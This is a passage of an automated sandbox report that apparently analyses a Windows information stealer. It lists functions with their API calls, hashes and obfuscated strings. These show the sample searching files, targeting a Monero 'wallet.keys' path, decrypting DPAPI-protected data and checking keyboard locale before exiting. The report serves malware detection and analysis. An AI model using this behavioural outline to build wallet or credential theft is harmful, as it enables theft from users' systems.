                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                          • Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
                          • Opcode Fuzzy Hash: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                          • Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2
                          Function 00557B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
                          • LocalFree.KERNEL32(00000000), ref: 00557D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                          • Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
                          • Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                          • Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61
                          Function 0091192A Relevance: 10.4, Strings: 7, Instructions: 1623COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "b\$09W$3tg>$6,=N$>]v~$Xg$rJOq
                          • API String ID: 0-3750414405
                          • Opcode ID: 80fe31009f0047b1ac6631fdb61053c4a2de37fe9e413d3402b4903f3af918ea
                          • Instruction ID: 9228a714ac55b966d9e6fbba49233609952b1ac9882e6e798acd8ea19a26c2a5
                          • Opcode Fuzzy Hash: 80fe31009f0047b1ac6631fdb61053c4a2de37fe9e413d3402b4903f3af918ea
                          • Instruction Fuzzy Hash: 38B21BF360C2049FE304AE2DEC8567ABBE9EFD4720F16493DEAC4C7744EA3558058696
                          Function 0091332F Relevance: 10.3, Strings: 7, Instructions: 1582COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: m$!)\>$%^~$(B}w$[F[{$].=$j;}
                          • API String ID: 0-1078124278
                          • Opcode ID: b46896a3566af23e9562d8511fa813e69668325130351b4f2a6e00ea9517c5a6
                          • Instruction ID: d32c28db23d4e09f71863888b361a44fc766eb4ccd354b6b816f8ccbf7738b71
                          • Opcode Fuzzy Hash: b46896a3566af23e9562d8511fa813e69668325130351b4f2a6e00ea9517c5a6
                          • Instruction Fuzzy Hash: EEB2E3F360C2049FD304AE2DEC8567AFBE9EF94720F1A493DE6C583740EA3598458697
                          Function 0054E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
                          • StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
                          • StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                          • Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
                          • Opcode Fuzzy Hash: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                          • Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92
                          Function 0090AA56 Relevance: 9.1, Strings: 6, Instructions: 1565COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Csw$Csw$WQNo$^Nw$>_c$GKq
                          • API String ID: 0-2741502615
                          • Opcode ID: 056da45c461e53fe1bb4d6deb0144f95fe8bf6e43d61d517d2ea11c397bde8c9
                          • Instruction ID: 8addd7f2ef191c2adcd6a19e9d158620b60a475bd12cf4691056dc8bd4c73ca9
                          • Opcode Fuzzy Hash: 056da45c461e53fe1bb4d6deb0144f95fe8bf6e43d61d517d2ea11c397bde8c9
                          • Instruction Fuzzy Hash: 7EB216F390C2049FE3046F29DC8567ABBE5EF94320F1A893DEAC5C7744EA3598058697
                          Function 00549AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                          • LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: NT
                          • API String ID: 4291131564-3872220154
                          • Opcode ID: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                          • Instruction ID: fa5fa80d131fc05bd5f03fd5fac8984afd61c662d84234e1d302f94a3c0d89c4
                          • Opcode Fuzzy Hash: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                          • Instruction Fuzzy Hash: B011AFB4640208BFEB10CF64DC95FAA77B5FB89704F208059FA159B390C7B6A901DBA4
                          Function 00909455 Relevance: 8.7, Strings: 6, Instructions: 1217COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )a?T$6'os$;#hN$}&$.!$>?
                          • API String ID: 0-1724863568
                          • Opcode ID: c20440c8c3c9ebc0fbb826686c39424ae996b304b9a6b8891567dab77f4c0503
                          • Instruction ID: d0c0ce590ecbfeb4f062544557540f603cc1181e3057b3d97ca91e307c6d0b08
                          • Opcode Fuzzy Hash: c20440c8c3c9ebc0fbb826686c39424ae996b304b9a6b8891567dab77f4c0503
                          • Instruction Fuzzy Hash: F1825BF3A082149FD3046E2DEC8567AFBE9EF94320F16463DEAC4D7744E63598058693
                          Function 0090FE5F Relevance: 7.8, Strings: 5, Instructions: 1574COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #+;v$#n?O$+p~w$7(9$i)
                          • API String ID: 0-1308280685
                          • Opcode ID: 8c1168a1c4a4315bcd0403600af47914d7329da724e216aae11955794d3de9e4
                          • Instruction ID: b2423f33cd0f524a9b7162b800f9560f4faf7f7cd2d639bedd3e841c4aba94dc
                          • Opcode Fuzzy Hash: 8c1168a1c4a4315bcd0403600af47914d7329da724e216aae11955794d3de9e4
                          • Instruction Fuzzy Hash: F1B2F4F350C2049FE304AF29EC8567AFBE5EF94320F16892DEAC483744EA3599458797
                          Function 0054C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                          • lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                          • lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                          • lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 9771b9d1cf07c616a6b5e2da44cdfba1ce6e791600867bd1a56466729afb9c71
                          • Instruction ID: 0952f7e63be9a2c22e63d705b46959ee00b5acae080033498fe7a5c5765fb6ae
                          • Opcode Fuzzy Hash: 9771b9d1cf07c616a6b5e2da44cdfba1ce6e791600867bd1a56466729afb9c71
                          • Instruction Fuzzy Hash: 8D41827590420EEFDB50CF90DD89BFEBBB8BB44304F1045A9E509A7280D7745A84CF95
                          Function 00556920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0055696C
                          • sscanf.NTDLL ref: 00556999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569C0
                          • ExitProcess.KERNEL32 ref: 005569DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                          • Instruction ID: 8caf9f43779a9a97a7eb2ede66784a3e42f99cde2df493f9a83766f1fc2f53a4
                          • Opcode Fuzzy Hash: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                          • Instruction Fuzzy Hash: 97210E75D00209ABDF04EFE4D9559EEBBB5FF48301F14852EE406E3250EB349608CB69
                          Function 00547240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0054724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00547254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00547281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005472A4
                          • LocalFree.KERNEL32(?), ref: 005472AE
